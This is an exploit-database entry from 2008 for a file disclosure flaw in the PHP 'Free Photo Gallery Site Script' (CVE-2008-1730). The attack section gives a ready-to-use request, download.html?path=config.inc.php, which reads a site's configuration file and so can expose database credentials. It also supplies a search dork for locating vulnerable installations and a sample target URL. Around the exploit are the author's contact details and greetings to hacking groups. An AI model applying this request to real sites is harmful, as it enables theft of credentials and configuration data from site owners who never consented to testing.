Free Photo Gallery Site Script - 'path' File Disclosure

Author: JIKO
type: webapps
platform: php
port: 
date_added: 2008-04-08 
date_updated: 2016-11-21 
verified: 1 
codes: OSVDB-44253;CVE-2008-1730 
tags: 
aliases:  
screenshot_url:  
application_url: 

-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : gallery-script-lite
# Bug   : Remote  Local File Inclusion Vulnerability
# Download  : http://www.arwscripts.com/gallery-script-lite.html
# Dork  : developed by ARWScripts.com
# file  : download.html
# Error  :

=========================JIkI Team===================
# Exploit  :

  http://[site]/[script]/download.html?path=
#ex   :
 download.html?path=config.inc.php
http://www.xxx.com/demos/galleryscriptlite/download.html?path=config.inc.php
===========
 greetz : all my friend and H-T Team and all No-back members and tryag.Com
 visit: www.no-back.org & www.tryag.com
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------

# milw0rm.com [2008-04-09]